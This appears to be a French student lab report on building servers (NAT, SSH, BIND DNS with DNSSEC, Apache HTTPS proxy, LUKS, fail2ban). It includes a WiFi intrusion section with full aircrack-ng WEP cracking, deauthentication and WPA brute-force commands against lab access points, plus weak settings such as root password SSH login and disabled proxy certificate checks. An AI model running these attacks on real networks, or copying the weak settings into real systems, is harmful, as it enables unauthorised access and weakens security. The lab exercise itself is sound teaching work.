&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL 86400&lt;br /&gt;
@   IN  SOA ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
        2026020320  ; Serial INCRÉMENTÉ et corrigé&lt;br /&gt;
        3600        ; Refresh&lt;br /&gt;
        1800        ; Retry&lt;br /&gt;
        604800      ; Expire&lt;br /&gt;
        86400       ; Minimum TTL&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN  NS  ns1.msalhi.online.&lt;br /&gt;
@       IN  NS  ns1.merteuil.tech.&lt;br /&gt;
&lt;br /&gt;
; Enregistrements&lt;br /&gt;
@       IN  A       193.48.57.167&lt;br /&gt;
@       IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
ns1     IN  A       193.48.57.167&lt;br /&gt;
ns1     IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
www     IN  CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.merteuil.tech&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Effraction WiFi =&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
Le réseau cible était &amp;lt;code&amp;gt;cracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;04:DA:D2:9C:50:50&amp;lt;/code&amp;gt;, canal 4). La procédure a été réalisée depuis la machine &amp;lt;code&amp;gt;zabeth13&amp;lt;/code&amp;gt; avec les outils &amp;lt;code&amp;gt;aircrack-ng&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Passage de la carte en mode monitor :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airmon-ng start wlan0&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Authentification fake (association au point d’accès) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Attaque ARP replay pour générer du trafic :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aircrack-ng capture_wep-01.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La clé WEP a été trouvée en moins de 15 minutes : &amp;lt;code&amp;gt;FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Cassage de mot de passe WPA‑PSK par force brute ==&lt;br /&gt;
Le réseau &amp;lt;code&amp;gt;kracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;44:AD:D9:5F:87:00&amp;lt;/code&amp;gt;, canal 13) utilisait WPA2‑PSK.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Désauthentification d’un client (identifié &amp;lt;code&amp;gt;40:A5:EF:01:25:8B&amp;lt;/code&amp;gt;) pour forcer un handshake :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après apparition du message '''“WPA handshake”''' dans &amp;lt;code&amp;gt;airodump‑ng&amp;lt;/code&amp;gt;, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Résultat : le mot de passe &amp;lt;code&amp;gt;66689666&amp;lt;/code&amp;gt; a été découvert après environ 30 minutes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.&lt;br /&gt;
[[Fichier:Wpa-wps.png|vignette]]&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
= Sécurisations =&lt;br /&gt;
&lt;br /&gt;
== Chiffrement de données ==&lt;br /&gt;
Sur Moon, une partition supplémentaire (disque virtuel &amp;lt;code&amp;gt;xvdb&amp;lt;/code&amp;gt;, correspondant au volume LVM &amp;lt;code&amp;gt;SE4.Moon.home&amp;lt;/code&amp;gt;) a été chiffrée avec LUKS.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Chiffrement de la partition&lt;br /&gt;
cryptsetup luksFormat /dev/xvdb&lt;br /&gt;
&lt;br /&gt;
# Ouverture du conteneur&lt;br /&gt;
cryptsetup open /dev/xvdb home_crypt&lt;br /&gt;
&lt;br /&gt;
# Création d’un système de fichiers&lt;br /&gt;
mkfs.ext4 /dev/mapper/home_crypt&lt;br /&gt;
&lt;br /&gt;
# Montage manuel&lt;br /&gt;
mount /dev/mapper/home_crypt /mnt/secret&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour automatiser le montage au démarrage, on ajoute dans &amp;lt;code&amp;gt;/etc/crypttab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
home_crypt /dev/xvdb none luks&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
et dans &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/mapper/home_crypt /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.&lt;br /&gt;
&lt;br /&gt;
== Filtrage des services – fail2ban ==&lt;br /&gt;
Pour protéger SSH et les requêtes DNS malveillantes, &amp;lt;code&amp;gt;fail2ban&amp;lt;/code&amp;gt; a été installé sur Moon et Solstice.&lt;br /&gt;
&lt;br /&gt;
Fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[DEFAULT]&lt;br /&gt;
bantime = 3600&lt;br /&gt;
findtime = 600&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
logpath = /var/log/auth.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[named-refused-tcp]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = domain,953&lt;br /&gt;
protocol = tcp&lt;br /&gt;
